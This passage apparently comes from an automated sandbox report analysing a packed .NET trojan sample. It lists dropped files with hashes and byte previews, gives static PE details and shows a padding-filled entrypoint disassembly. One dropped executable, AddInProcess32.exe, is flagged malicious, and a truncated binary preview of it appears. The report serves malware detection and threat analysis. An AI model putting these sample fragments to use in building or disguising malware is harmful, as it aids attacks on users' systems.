                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="833966" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER61D.tmp.dmp
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 16 streams, Tue Jan 26 18:16:09 2021, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1079338
                                                                                                  Entropy (8bit):1.3827411222548762
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Nu1mqjmEwmQy0CVdPze+HbtmFXdjiM06uGDBPLudUHKrndxpdigCj6Mw6P:5hmQxCLPze+7IdjiMxxud0PV
                                                                                                  MD5:80EA4A10004616EE730CCD4396A810E1
                                                                                                  SHA1:CB9BC12B2D4EE4025CD3D330F7874ACBD682B614
                                                                                                  SHA-256:7138CAD36DB6FA5CF892E655D09C279DFAABF4D25F102F83B6B84646AAD92576
                                                                                                  SHA-512:1249B5A014E2D17C2347A6F38C7A1E224959D87C0CD9185A0D13874E0BEB001C577E213298D7F2B14D7547D9B64531D8B3AF8FE464C2E98F9665FF153604835A
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: MDMP....... .......i\.`...................U...........B.......}......Lw......................T.......`....@.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe.log
                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1873
                                                                                                  Entropy (8bit):5.355036985457214
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovitHoxHhAHKzvr1qHj:iqXeqm00YqhQnouRqjoKtIxHeqzTwD
                                                                                                  MD5:CDA95282F22F47DA2FDDC9E912B67FEF
                                                                                                  SHA1:67A40582A092B5DF40C3EB61A361A2D336FC69E0
                                                                                                  SHA-256:179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
                                                                                                  SHA-512:1D151D92AE982D2149C2255826C2FFB89A475A1EB9B9FE93DC3706F3016CD6B309743B36A4D7F6D68F48CE25391FDA7A2BAE42061535EEA7862460424A3A2036
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:5l:7
                                                                                                  MD5:2DD3F3C33E7100EC0D4DBBCA9774B044
                                                                                                  SHA1:B254D47F2B9769F13B033CAE2B0571D68D42E5EB
                                                                                                  SHA-256:5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
                                                                                                  SHA-512:C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.408222675578688
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:d:d
                                                                                                  MD5:419A089E66B9E18ADA06C459B000CB4D
                                                                                                  SHA1:ED2108A58BA73AC18C3D2BF0D8C1890C2632B05A
                                                                                                  SHA-256:C48E42E9AB4E25B92C43A7B0416D463B9FF7C69541E4623A39513BC98085F424
                                                                                                  SHA-512:BBD57BEA7159748E1B13B3E459E2C8691A46BDC9323AFDB9DBF9D8F09511750D46A1D98C717C7ADCA07D79EDC859E925476DD03231507F37F45775C0A79A593C
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:A/lll:A/
                                                                                                  MD5:635E15CB045FF4CF0E6A31C827225767
                                                                                                  SHA1:F1EAAA628678441481309261FABC9D155C0DD6CB
                                                                                                  SHA-256:67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
                                                                                                  SHA-512:81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:7/lll:x
                                                                                                  MD5:F6B463BE7B50F3CC5D911B76002A6B36
                                                                                                  SHA1:C94920D1E0207B0F53D623A96F48D635314924D2
                                                                                                  SHA-256:16E4D1B41517B48CE562349E3895013C6D6A0DF4FCFFC2DA752498E33C4D9078
                                                                                                  SHA-512:4D155DFEDD3D44EDFBBE7AC84D3E81141D4BB665399C2A5CF01605C24BD12E6FAF87BB5B666EA392E1B246005DFABDE2208ED515CD612D34BAC7F965FD6CC57E
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:lX:1
                                                                                                  MD5:2D84AD5CFDF57BD4E3656BCFD9A864EA
                                                                                                  SHA1:B7B82E72891E16D837A54F94960F9B3C83DC5552
                                                                                                  SHA-256:D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
                                                                                                  SHA-512:0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:2/l/:S/
                                                                                                  MD5:60476A101249AEDFF09A43E047040191
                                                                                                  SHA1:DE5B6A0ADC7DE7180E19286CF0F13567278CDB64
                                                                                                  SHA-256:35BC77A06BFDDE8C8F3A474C88520262B88C7B8992EE6B2D5CF41DDDC77A83FB
                                                                                                  SHA-512:F1D2DCC562A36434C6C6405EC4EAC7ECFA76FC5A940114DA6F94495B77584A132D5D82AD3556DF749490BE096CFD238FA8B484B7C734CBC4D074E963E5D451F4
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:3X:n
                                                                                                  MD5:AE6FBDED57F9F7D048B95468DDEE47CA
                                                                                                  SHA1:C4473EA845BE2FB5D28A61EFD72F19D74D5FC82E
                                                                                                  SHA-256:D3C9D1FF7B54B653C6A1125CAC49F52070338A2DD271817BBA8853E99C0F33A9
                                                                                                  SHA-512:F119D5AD9162F0F5D376E03A9EA15E30658780E18DD86E81812DDA8DDF59ADDD1DAA0706B2F5486DF8F17429C2C60AA05D4F041A2082FD2EC6EA8CC9469FADE3
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Wtl:WX
                                                                                                  MD5:D192F7C343602D02E3E020807707006E
                                                                                                  SHA1:82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
                                                                                                  SHA-256:BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
                                                                                                  SHA-512:AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:s:s
                                                                                                  MD5:2A8875D2AF46255DB8324AAD9687D0B7
                                                                                                  SHA1:7A066FA7B69FB5450C26A1718B79AD27A9021CA9
                                                                                                  SHA-256:54097CCCAE0CFCE5608466BA5A5CA2A3DFEAC536964EEC532540F3B837F5A7C7
                                                                                                  SHA-512:2C39F05A4DFFD30800BB7FBB3FF2018CF4CC96398460B7492F05CE6AFD59079FD6E3EB7C4F8384A35A954A22B4934C162A38534AD76CFB2FD772BCF10E211F7C
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:a/l/:e/
                                                                                                  MD5:F732BF1006B6529CFFBA2B9F50C4B07F
                                                                                                  SHA1:D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
                                                                                                  SHA-256:77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
                                                                                                  SHA-512:064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:EX:EX
                                                                                                  MD5:FC94FE7BD3975E75CEFAD79F5908F7B3
                                                                                                  SHA1:78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
                                                                                                  SHA-256:EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
                                                                                                  SHA-512:4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7416
                                                                                                  Entropy (8bit):0.018369280867001292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:tn1lIlt:y
                                                                                                  MD5:C481876E5724DACEEA95544E8D8464B3
                                                                                                  SHA1:AC446C8AE756FF79632A6CDA049A63F753332967
                                                                                                  SHA-256:74D44331B0E0AD282D34B5667F454B593769AB5E24FE00E80975E688939F3792
                                                                                                  SHA-512:788F79C7AFE4D4AC8B37D34753CF9AC290908C87260DF176CFE07DABE8F95E3F686F725485E1F9238719E2DA9810D2E8D1D364636CAC729EC584EC0E7058A22F
                                                                                                  Malicious:false
                                                                                                  Preview: ..0 IMMM ...............e...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6:6
                                                                                                  MD5:379523B9F5D5B954E719B664846DBF8F
                                                                                                  SHA1:930823EC80B85EDD22BAF555CAD21CDF48F066AA
                                                                                                  SHA-256:3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
                                                                                                  SHA-512:ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:V/l/:/
                                                                                                  MD5:5F243BF7CC0A348B6D31460A91173E71
                                                                                                  SHA1:5696B34625F027EC01765FC2BE49EFCFD882BF8E
                                                                                                  SHA-256:1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
                                                                                                  SHA-512:9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):1.6368421881310118
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:J:J
                                                                                                  MD5:DB7C049E5E4E336D76D5A744C28C54C8
                                                                                                  SHA1:A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
                                                                                                  SHA-256:E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
                                                                                                  SHA-512:B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
                                                                                                  Malicious:false
                                                                                                  Preview: CMMM ...................
                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132561585936642615.txt.~tmp
                                                                                                  Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):113942
                                                                                                  Entropy (8bit):5.192679852203261
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:f/Y1U/gT2/Hb/jn/WI/Zk/Ey/eX/NV/CzS/1o/Yd/e6/Wo/ie/L//6Ij/kh2oO/a:izrotYW9Nmri84qgA
                                                                                                  MD5:C0F583E4B7E550A2C45110DF648535C7
                                                                                                  SHA1:23FD5D6DC6FAD4EFE6C8D230BEE44A94B3C0AE22
                                                                                                  SHA-256:ADC27844BB5ECDB42F3614E3F347BFFDBBC95670E96139F35F872F0EEFF6D48A
                                                                                                  SHA-512:5A2F2ACAD92A97DA3EDBFE0E26A78E6EA6FF91CA64BEE73DD75F8A1746D65CD26C461396A0B61D33685CCC8E601C41CA145036ACF668703C35013F081915F0F8
                                                                                                  Malicious:false
                                                                                                  Preview: [{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"Chrome","Type":12},"System.Software.TimesUsed":{"Value":2,"Type":5},"System.Tile.Background":{"Value":4284441448,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"chrome","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.324592461032E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Google\\Chrome\\Application\\chrome.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Google Chrome","Type":12}},{"System.FileExtension":{"Value":".com/","Type"
                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl
                                                                                                  Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                  File Type:Targa image data - Map 65536 x 65536 x 0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.12612858904227983
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:GqKVXZ/EyM2xX/7EHIJY6iK8tJRKQ1UMCl2rjoD7CePglyDQqmU9:GqKblbWMY6iKUJ9SMClCjoHCeIlyjb
                                                                                                  MD5:AA5171A81CD83B2A43E07991ED2DD12A
                                                                                                  SHA1:D31D9647C43692172CD69816A8E302A5C90C8B67
                                                                                                  SHA-256:60E8DBC665930E28464E6023919CE1C3D1042690E1F4C35443136541BFAF4EA9
                                                                                                  SHA-512:02D1732A4087C742764A444186BE904A6B2F27327A5586443D3528778CDBD242DF3D06747F109CF3A2BB627F6DDEE9F0F6D91E47858AF0C761ACF235848DB72A
                                                                                                  Malicious:false
                                                                                                  Preview: ............................................................................d...........W.f......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1...........................................................*........ .....W.f.............C.7.C.B.3.E.B.D.-.9.9.8.4.-.4.2.9.F.-.A.4.2.8.-.B.6.E.5.1.2.5.8.A.0.B.5...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...C.o.r.t.a.n.a._.c.w.5.n.1.h.2.t.x.y.e.w.y.\.T.e.m.p.S.t.a.t.e.\.T.r.a.c.e.s.\.C.o.r.t.a.n.a.T.r.a.c.e.1...e.t.l...........P.P..........9p.....................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):42080
                                                                                                  Entropy (8bit):6.2125074198825105
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                                  MD5:F2A47587431C466535F3C3D3427724BE
                                                                                                  SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                                  SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                                  SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: SlaZL2LqI2.exe, Detection: malicious, Browse
                                                                                                  • Filename: 4NoiNHCNoU.exe, Detection: malicious, Browse
                                                                                                  • Filename: SoPwZKv1Mf.exe, Detection: malicious, Browse
                                                                                                  • Filename: bXFjrxjRlb.exe, Detection: malicious, Browse
                                                                                                  • Filename: Generator.cont.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: 560911_P.EXE, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: IMG_61779.pdf.exe, Detection: malicious, Browse
                                                                                                  • Filename: IMG_5391.EXE, Detection: malicious, Browse
                                                                                                  • Filename: czZ769nM6r.exe, Detection: malicious, Browse
                                                                                                  • Filename: IMG_1107.EXE, Detection: malicious, Browse
                                                                                                  • Filename: r3q6Bv8naR.exe, Detection: malicious, Browse
                                                                                                  • Filename: sy1RnlHl8Y.exe, Detection: malicious, Browse
                                                                                                  • Filename: qyMlTIBawC.exe, Detection: malicious, Browse
                                                                                                  • Filename: Qn2AQrgfqJ.exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Trojan.PackedNET.509.28611.exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Trojan.PackedNET.509.17348.exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Trojan.PackedNET.509.7497.exe, Detection: malicious, Browse
                                                                                                  • Filename: IMG_12283.exe, Detection: malicious, Browse
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):5.628782115819407
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  File name:SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
                                                                                                  File size:775168
                                                                                                  MD5:25fcc01067cabbf5d1aa3a2f8b18ed50
                                                                                                  SHA1:9f45d2e8e415ab38f42e4edb9b503ce82fed2402
                                                                                                  SHA256:ba4721d93c056ef1763667732344fdc82066d71f0003e18ad03f6d93307b82fe
                                                                                                  SHA512:6bb9a73bfec5a0cb20b16ecaae7d31ef5c8a069d83466b1247046e766204fedd9d8fe86d59856fe143498e27791594494131e31a7d0fea7fe1a16de05ea12a94
                                                                                                  SSDEEP:12288:27r001HnHfNbxp+pPnGUw2DargRxEc3kstvo:Ur00n/mfM/8HUY
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.q*.....................J........... ........@.. .......................@............`................................

                                                                                                  File Icon

                                                                                                  Icon Hash:8aeeae8e96a2d0d6

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4ba6fe
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                  Time Stamp:0x2A71AA39 [Sat Jul 25 19:23:37 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
